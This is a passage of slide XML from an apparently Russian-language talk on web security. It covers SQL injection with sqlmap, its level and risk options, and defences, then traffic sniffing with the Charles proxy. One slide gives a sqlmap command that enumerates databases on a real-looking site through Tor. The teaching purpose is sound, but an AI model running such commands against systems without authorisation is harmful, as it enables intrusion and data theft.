                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38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xEl>
                                              <p:pRg end="8" st="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38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391" name="Shape 391"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>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Shape 39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Запуск SQLmap</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394" name="Shape 394"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675125" y="3966375"/>
            <a:ext cx="8289900" cy="1367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ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ python sqlmap.py -u "http://site.ua?id=34" --random-agent -tor --dbs</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="395" name="Shape 395"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1855751" y="1257300"/>
            <a:ext cx="4991100" cy="262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401" name="Shape 401"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="На сколько страшна уязвимость Sql injection" id="402" name="Shape 402" title="SQLmap">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467525" y="46025"/>
            <a:ext cx="6733724" cy="5050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408" name="Shape 408"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Shape 409"/>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Shape 41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Дополнительно</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411" name="Shape 411"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273719" y="1484918"/>
            <a:ext cx="5404200" cy="1236300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>level = (1 - 5)</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221975" y="3245845"/>
            <a:ext cx="7449000" cy="1236300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>risk = (1 - 3)</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Medium_signal-512.png" id="413" name="Shape 413"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524004" y="990600"/>
            <a:ext cx="2389041" cy="2094564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="leadership_fun_260613_2.jpg" id="414" name="Shape 414"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143462" y="3085154"/>
            <a:ext cx="3272099" cy="20583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420" name="Shape 420"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 421"/>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2" name="Shape 42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Как защитится</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423" name="Shape 423"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675125" y="1190975"/>
            <a:ext cx="8061900" cy="12255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sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Не помещать в БД данные без обработки.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Не помещать в запрос управляющие структуры и идентификаторы, введенные пользователем.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Добавить капчу</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Docteur-je-souffre.jpg" id="424" name="Shape 424"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5812225" y="2264075"/>
            <a:ext cx="2913650" cy="2602575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 425"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748850" y="3167325"/>
            <a:ext cx="4358100" cy="530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t>https://haveibeenpwned.com/</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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Effect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Effect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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4" st="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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5" st="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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6" st="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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SQL injection</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431" name="Shape 431"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Shape 432"/>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Сниффинг</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1304400683_195239635_1----250-3333.jpg" id="434" name="Shape 434"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589700" y="1217832"/>
            <a:ext cx="2137846" cy="1197064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="obsluga-server.jpg" id="435" name="Shape 435"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720347" y="952650"/>
            <a:ext cx="1395488" cy="1576369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496249" y="2439425"/>
            <a:ext cx="1395600" cy="296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t>Клиент</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="437" name="Shape 437"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3966534" y="1662868"/>
            <a:ext cx="2583300" cy="14100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="6AA84F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Shape 438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6920633" y="2527943"/>
            <a:ext cx="1395600" cy="26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t>Сервер</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="439" name="Shape 439"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3945085" y="2152193"/>
            <a:ext cx="1120800" cy="813600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5065895" y="1816563"/>
            <a:ext cx="1476900" cy="1149300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="e1bbe267cf539ecbc3c9aee2493.jpg" id="441" name="Shape 441"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4127609" y="3004620"/>
            <a:ext cx="1426957" cy="1548280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Shape 442"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045474" y="1124907"/>
            <a:ext cx="2351700" cy="35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    Первичное соединение</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Shape 443"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207981" y="2903759"/>
            <a:ext cx="1120800" cy="18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перехват</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Shape 444"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4150572" y="4670499"/>
            <a:ext cx="1284300" cy="374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t>Хацкер</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450" name="Shape 450"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Shape 451"/>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2" name="Shape 45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Сниффинг -&gt; Charles</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="453" name="Shape 453"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134275" y="1224475"/>
            <a:ext cx="3301775" cy="3301775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Shape 454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4528825" y="1179900"/>
            <a:ext cx="4267500" cy="349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ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Charles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>э</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>то инструмент proxy/монитор/Reverse Proxy позволяющий пользователю наблюдать за всем HTTP/HTTPS трафиком между компьютером и сетью Интернет. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">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2.JPG" id="460" name="Shape 460"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Shape 461"/>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2" name="Shape 46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Работа с Charles</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id="463" name="Shape 463"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1786901" y="1106475"/>
            <a:ext cx="5752039" cy="3912900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Shape 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2190225" y="1497825"/>
            <a:ext cx="289800" cy="261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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="469" name="Shape 469"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Shape 47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471" name="Shape 471"/>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2" name="Shape 47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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Charles</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id="473" name="Shape 473"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
